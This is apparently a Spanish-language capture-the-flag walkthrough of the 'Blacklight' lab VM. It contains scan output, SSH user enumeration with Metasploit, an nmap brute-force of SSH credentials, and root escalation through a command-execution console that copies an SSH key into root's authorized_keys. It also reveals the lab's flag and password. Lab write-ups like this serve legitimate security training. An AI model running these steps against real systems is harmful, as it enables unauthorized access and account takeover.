Blacklight - danielcastropalomares/security GitHub Wiki
Escaneamos con nmap:
root@kali:~# nmap -A 172.31.255.131
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-04 12:45 CET
Nmap scan report for 172.31.255.131
Host is up (0.00032s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BLACKLIGHT
MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 172.31.255.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
Con nikto analizamos la estructura del servidor web:
root@kali:~# nikto -host 172.31.255.131
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.131
+ Target Hostname: 172.31.255.131
+ Target Port: 80
+ Start Time: 2018-11-04 12:46:29 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x6df 0x56e163c2e4a62
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2018-11-04 12:46:39 (GMT1) (10 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.29) are not in
the Nikto database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)? n
Con el script vuln de nmap encontramos mas directorios:
root@kali:~# nmap -Pn --script vuln 172.31.255.131
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-04 12:49 CET
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 172.31.255.131
Host is up (0.00023s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /robots.txt: Robots file
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC)
En el fichero robots encontramos lo siguiente:
http://172.31.255.131/robots.txt
User-agent: *
flag1.txt
blacklight.dict
Encontramos la primera flag:
http://172.31.255.131/flag1.txt
{flag1:fc4c7223964a26b152823d14f129687207e7fe15}
9072. The secret is at home.
Volvemos a escanear todos los puertos:
root@kali:~# nmap -p- 172.31.255.131
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-04 13:06 CET
Nmap scan report for 172.31.255.131
Host is up (0.00020s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
80/tcp open http
9072/tcp open unknown
MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC)
Vemos que el puerto 9072 se encuentra abierto y hace relación al fichero flag1.txt encontrado anteriormente. Si nos conectamos por telnet aparece un menú:
root@kali:~# telnet 172.31.255.131 9072
Trying 172.31.255.131...
Connected to 172.31.255.131.
Escape character is '^]'.
BLACKLIGHT console mk1. Type .help for instructions
.help
.readhash - Get one step closer
.exec <cmd> - Execute commands
.quit - Exit the server
.readhash
b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6
Probamos a levantar el servidor SSH via exec:
.exec /etc/init.d/ssh start
Si lanzamos un telnet vemos que contesta:
root@kali:~# telnet 172.31.255.131 22
Trying 172.31.255.131...
Connected to 172.31.255.131.
Escape character is '^]'.
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4
Es una versión vulnerable, así que vamos a probar a enumerar usuarios:
msf auxiliary(scanner/ssh/ssh_enumusers) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.131:22 - SSH - Using malformed packet technique
[*] 172.31.255.131:22 - SSH - Starting scan
[+] 172.31.255.131:22 - SSH - User 'root' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
En este caso la VM se llama blacklight:
msf auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME blacklight
USERNAME => blacklight
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.131:22 - SSH - Using malformed packet technique
[*] 172.31.255.131:22 - SSH - Starting scan
[+] 172.31.255.131:22 - SSH - User 'blacklight' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Y ahora con el diccionario que anteriormente hemos encontrado vía web, vamos a lanzar el nmap con el script brute. Dentro del fichero users.lst solo añadiremos el usuario "blacklight":
nmap --script=ssh-brute --script-args userdb=users.lst,passdb=blacklight.dict 172.31.255.131
Bingo ha encontrado una coincidencia:
22/tcp open ssh
| ssh-brute:
| Accounts:
| blacklight:iambl - Valid credentials
Lo primero que vamos a comprobar son los grupos del usuario:
blacklight@blacklight:~$ id
uid=1000(blacklight) gid=1004(blacklight) groups=1004(blacklight),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),1000(lpadmin),1001(sambashare),1002(debian-tor),1003(libvirtd)
No se encuentra del grupo sudo:
blacklight@blacklight:~$ sudo -l
[sudo] password for blacklight:
Sorry, user blacklight may not run sudo on blacklight.
Vemos que el script console se ejecuta como root, así que vamos aprovecharnos de ello:
blacklight@blacklight:~$ ps aux | grep console
root 734 0.0 0.0 4628 816 ? Ss 21:28 0:00 /bin/sh -c /bin/ruby /home/blacklight/console.rb
root 735 0.0 0.9 47536 9084 ? Sl 21:28 0:00 /bin/ruby /home/blacklight/console.rb
Lo primero de todo es eliminar los counts del script, de esta manera podemos ejecutar todos los comandos que queremos (ya que por defecto al introducir mas de dos comandos se cerraba la shell).
if line == '.readhash'
connection.puts File.read('/home/blacklight/hash.txt')
counter += 1
end
if line =~ /.exec/
cmd = line.split(" ")[1..line.length - 1].join(' ')
system(cmd)
counter += 1
Ahora reiniciamos la maquina, volvemos a iniciar el SSH como hemos hecho antes. Y vamos a comprobar si el usuario root dispone de keys en su authorized_key:
.exec cat /root/.ssh/authorized_keys > /tmp/result
blacklight@blacklight:~$ cat /tmp/result
Esta vacío ya que no nos devuelve nada, así que vamos a copiar nuestra key (que anteriormente hemos subido al usuario blacklight):
.exec cat /home/blacklight/.ssh/authorized_keys > /root/.ssh/authorized_keys
Ahora si accedemos por SSH ya estamos dentro con el usuario root:
root@kali:~# ssh [email protected]
___. .__ __ .__ .__ .__ __
\_ |__ | | _____ ____ | | _| | |__| ____ | |___/ |_
| __ \ | | \__ \ _/ ___\| |/ / | | |/ ___\| | \ __\
| \_\ \| |__/ __ \ \___ | <| |_| / /_/ > Y \ |
|___ /|____(____ /\___ >__|_ \____/__\___ /|___| /__|
\/ \/ \/ \/ /_____/ \/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@blacklight:~#